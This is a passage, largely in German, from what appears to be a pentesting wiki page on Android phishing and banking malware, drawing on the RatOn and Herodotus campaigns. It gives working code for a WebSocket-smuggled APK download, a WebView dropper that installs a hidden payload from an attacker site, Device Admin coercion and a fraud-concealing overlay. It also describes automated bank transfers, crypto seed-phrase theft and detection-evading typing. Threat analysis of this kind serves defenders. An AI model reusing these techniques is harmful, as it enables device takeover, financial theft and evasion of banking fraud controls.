// Accumulate binary chunks and drive fake Play progress UI const chunks = []; socket.on(“chunk”, (chunk) => chunks.push(chunk)); socket.on(“downloadProgress”, (p) => updateProgressBar(p));

// Assemble APK client‑side and trigger browser save dialog socket.on(“downloadComplete”, () => { const blob = new Blob(chunks, { type: “application/vnd.android.package-archive” }); const url = URL.createObjectURL(blob); const a = document.createElement(“a”); a.href = url; a.download = “app.apk”; a.style.display = “none”; document.body.appendChild(a); a.click(); });

</details>

Warum es einfache Kontrollen umgeht:
- Es wird keine statische APK-URL offengelegt; die Payload wird im Speicher aus WebSocket-Frames rekonstruiert.
- URL-/MIME-/Extension-Filter, die direkte .apk-Antworten blockieren, können binäre Daten, die via WebSockets/Socket.IO getunnelt werden, übersehen.
- Crawler und URL-Sandboxes, die keine WebSockets ausführen, rufen die Payload nicht ab.

Siehe auch WebSocket tradecraft and tooling:

<a class="content_ref" href="../../pentesting-web/websocket-attacks.md"><span class="content_ref_label">WebSocket Attacks</span></a>


## Android Accessibility/Overlay & Device Admin Abuse, ATS automation, and NFC relay orchestration – RatOn case study

Die RatOn banker/RAT-Kampagne (ThreatFabric) ist ein konkretes Beispiel dafür, wie moderne mobile Phishing-Operationen WebView-Dropper, Accessibility-gesteuerte UI-Automation, Overlays/Ransom, Device Admin-Koerzierung, Automated Transfer System (ATS), crypto wallet takeover und sogar NFC-relay-Orchestrierung kombinieren. Dieser Abschnitt abstrahiert die wiederverwendbaren Techniken.

### Stage-1: WebView → native install bridge (dropper)
Angreifer zeigen ein WebView, das auf eine Angreifer-Seite verweist, und injizieren eine JavaScript-Schnittstelle, die einen nativen Installer exponiert. Ein Tippen auf einen HTML-Button ruft nativen Code auf, der eine in den Assets des Dropper gebündelte Second-Stage-APK installiert und diese anschließend direkt startet.

Minimales Muster:

<details>
<summary>Stage-1 dropper minimal pattern (Java)</summary>
```java
public class DropperActivity extends Activity {
@Override protected void onCreate(Bundle b){
super.onCreate(b);
WebView wv = new WebView(this);
wv.getSettings().setJavaScriptEnabled(true);
wv.addJavascriptInterface(new Object(){
@android.webkit.JavascriptInterface
public void installApk(){
try {
PackageInstaller pi = getPackageManager().getPackageInstaller();
PackageInstaller.SessionParams p = new PackageInstaller.SessionParams(PackageInstaller.SessionParams.MODE_FULL_INSTALL);
int id = pi.createSession(p);
try (PackageInstaller.Session s = pi.openSession(id);
InputStream in = getAssets().open("payload.apk");
OutputStream out = s.openWrite("base.apk", 0, -1)){
byte[] buf = new byte[8192]; int r; while((r=in.read(buf))>0){ out.write(buf,0,r);} s.fsync(out);
}
PendingIntent status = PendingIntent.getBroadcast(this, 0, new Intent("com.evil.INSTALL_DONE"), PendingIntent.FLAG_UPDATE_CURRENT | PendingIntent.FLAG_IMMUTABLE);
pi.commit(id, status.getIntentSender());
} catch (Exception e) { /* log */ }
}
}, "bridge");
setContentView(wv);
wv.loadUrl("https://attacker.site/install.html");
}
}

HTML auf der Seite:

<button onclick="bridge.installApk()">Install</button>

Nach der Installation startet der dropper die payload über ein explizites package/activity:

Intent i = new Intent();
i.setClassName("com.stage2.core", "com.stage2.core.MainActivity");
startActivity(i);

Hunting-Idee: nicht vertrauenswürdige Apps, die addJavascriptInterface() aufrufen und dem WebView installerähnliche Methoden exponieren; APK, die ein eingebettetes sekundäres payload unter assets/ mitliefert und die Package Installer Session API aufruft.

Consent funnel: Accessibility + Device Admin + follow-on runtime prompts

Stage-2 öffnet ein WebView, das eine „Access“-Seite hostet. Ihr Button ruft eine exportierte Methode auf, die das Opfer zu den Accessibility-Einstellungen navigiert und das Aktivieren des bösartigen Dienstes anfragt. Nach Gewährung nutzt die Malware Accessibility, um nachfolgende Runtime-Berechtigungsdialoge (contacts, overlay, manage system settings, etc.) programmatisch zu akzeptieren und fordert Device Admin an.

• Accessibility hilft programmatisch, spätere Prompts zu akzeptieren, indem es Buttons wie “Allow”/“OK” im Node-Tree findet und Klicks auslöst.
• Overlay permission check/request:

if (!Settings.canDrawOverlays(ctx)) {
Intent i = new Intent(Settings.ACTION_MANAGE_OVERLAY_PERMISSION,
Uri.parse("package:" + ctx.getPackageName()));
ctx.startActivity(i);
}

Siehe auch:

Accessibility Services Abuse

Overlay-Phishing/Erpressung über WebView

Operatoren können Befehle ausgeben, um:

• ein Vollbild-Overlay von einer URL anzuzeigen, oder
• inline HTML zu übergeben, das in ein WebView-Overlay geladen wird.

Wahrscheinliche Verwendungsfälle: Zwang (PIN-Eingabe), Öffnen von Wallets zum Abfangen von PINs, Erpressungsnachrichten. Behalte einen Befehl bei, um sicherzustellen, dass die Overlay-Berechtigung erteilt ist, falls sie fehlt.

Fernsteuerungsmodell – textlicher Pseudo-Screen + screen-cast

• Geringe Bandbreite: periodisch den Accessibility node tree dumpen, sichtbare Texte/Rollen/Bounds serialisieren und als Pseudo-Screen an C2 senden (Befehle wie txt_screen einmalig und screen_live kontinuierlich).
• Hohe Detailtreue: MediaProjection anfordern und bei Bedarf screen-casting/recording starten (Befehle wie display / record).

ATS-Playbook (Bank-App-Automation)

Anhand einer JSON-Task die Bank-App öffnen, die UI via Accessibility mit einer Mischung aus Textabfragen und Koordinaten-Taps steuern und die Zahlungs-PIN des Opfers eingeben, wenn dazu aufgefordert.

Beispiel-Task:

{
"cmd": "transfer",
"receiver_address": "ACME s.r.o.",
"account": "123456789/0100",
"amount": "24500.00",
"name": "ACME"
}

Beispieltexte, gesehen in einem Zielablauf (CZ → EN):

• “Nová platba” → “Neue Zahlung”
• “Zadat platbu” → “Zahlung eingeben”
• “Nový příjemce” → “Neuer Empfänger”
• “Domácí číslo účtu” → “Inländische Kontonummer”
• “Další” → “Weiter”
• “Odeslat” → “Senden”
• “Ano, pokračovat” → “Ja, fortfahren”
• “Zaplatit” → “Bezahlen”
• “Hotovo” → “Fertig”

Operatoren können Überweisungsgrenzen auch per Befehlen wie check_limit und limit prüfen/erhöhen; diese navigieren ähnlich durch die Limits-UI.

Crypto wallet seed extraction

Ziele wie MetaMask, Trust Wallet, Blockchain.com, Phantom. Ablauf: entsperren (gestohlener PIN oder bereitgestelltes Passwort), zu Security/Recovery navigieren, Seed-Phrase anzeigen/aufdecken, keylog/exfiltrate it. Implementiere locale-aware selectors (EN/RU/CZ/SK), um die Navigation über verschiedene Sprachen hinweg zu stabilisieren.

Device Admin coercion

Device Admin APIs werden verwendet, um die Möglichkeiten zur PIN-Erfassung zu erhöhen und das Opfer zu frustrieren:

• Sofortige Sperre:

dpm.lockNow();

• Aktuelle Anmeldeinformationen ablaufen lassen, um eine Änderung zu erzwingen (Accessibility erfasst neue PIN/Passwort):

dpm.setPasswordExpirationTimeout(admin, 1L); // requires admin / often owner

• Erzwinge nicht-biometrische Entsperrung, indem du die biometrischen Keyguard-Funktionen deaktivierst:

dpm.setKeyguardDisabledFeatures(admin,
DevicePolicyManager.KEYGUARD_DISABLE_FINGERPRINT |
DevicePolicyManager.KEYGUARD_DISABLE_TRUST_AGENTS);

Hinweis: Viele DevicePolicyManager-Kontrollen erfordern Device Owner/Profile Owner auf aktuellen Android-Versionen; einige OEM-Builds können nachlässig sein. Immer auf Ziel-OS/OEM validieren.

NFC-Relay-Orchestrierung (NFSkate)

Stage-3 kann ein externes NFC-relay-Modul installieren und starten (z. B. NFSkate) und ihm sogar eine HTML-Vorlage übergeben, um das Opfer während des Relays zu führen. Das ermöglicht kontaktloses card-present Cash-out neben online ATS.

Background: NFSkate NFC relay.

Operator-Befehlssatz (Beispiel)

• UI/Zustand: txt_screen, screen_live, display, record
• Soziales: send_push, Facebook, WhatsApp
• Overlays: overlay (inline HTML), block (URL), block_off, access_tint
• Wallets: metamask, trust, blockchain, phantom
• ATS: transfer, check_limit, limit
• Gerät: lock, expire_password, disable_keyguard, home, back, recents, power, touch, swipe, keypad, tint, sound_mode, set_sound
• Kommunikation/Recon: update_device, send_sms, replace_buffer, get_name, add_contact
• NFC: nfs, nfs_inject

Accessibility-getriebene ATS-Anti-Erkennung: menschliche Textkadenz und duale Texteinspritzung (Herodotus)

Threat actors mischen zunehmend Accessibility-getriebene Automation mit Anti-Erkennungsmaßnahmen, die gegen grundlegende Verhaltensbiometrie getuned sind. Ein aktueller banker/RAT zeigt zwei komplementäre Textliefer-Modi und einen Operator-Schalter, um menschliches Tippen mit randomisierter Kadenz zu simulieren.

• Discovery-Modus: sichtbare Nodes mit Selectors und bounds aufzählen, um Eingaben präzise anzusprechen (ID, text, contentDescription, hint, bounds), bevor gehandelt wird.
• Duale Texteinspritzung:
• Modus 1 – ACTION_SET_TEXT direkt auf das Ziel-Node (stabil, keine Tastatur);
• Modus 2 – Clipboard setzen + ACTION_PASTE in das fokussierte Node (funktioniert, wenn direktes setText blockiert ist).
• Menschliche Kadenz: die vom Operator bereitgestellte Zeichenkette aufteilen und Zeichen für Zeichen mit randomisierten 300–3000 ms Verzögerungen zwischen den Events liefern, um Heuristiken für “machine-speed typing” zu umgehen. Implementiert entweder durch progressives Vergrößern des Wertes via ACTION_SET_TEXT oder durch Einfügen eines Zeichens nach dem anderen.

</details>

Blockierende Overlays zur Verschleierung von Betrug:
- Ein vollbildiges `TYPE_ACCESSIBILITY_OVERLAY` mit vom Operator gesteuerter Opazität anzeigen; gegenüber dem Opfer undurchsichtig halten, während die Remote-Automatisierung darunter weiterläuft.
- Typischerweise verfügbare Befehle: `opacityOverlay <0..255>`, `sendOverlayLoading <html/url>`, `removeOverlay`.

Minimales Overlay mit einstellbarem Alpha:
```java
View v = makeOverlayView(ctx); v.setAlpha(0.92f); // 0..1
WindowManager.LayoutParams lp = new WindowManager.LayoutParams(
MATCH_PARENT, MATCH_PARENT,
WindowManager.LayoutParams.TYPE_ACCESSIBILITY_OVERLAY,
WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE |
WindowManager.LayoutParams.FLAG_NOT_TOUCH_MODAL,
PixelFormat.TRANSLUCENT);
wm.addView(v, lp);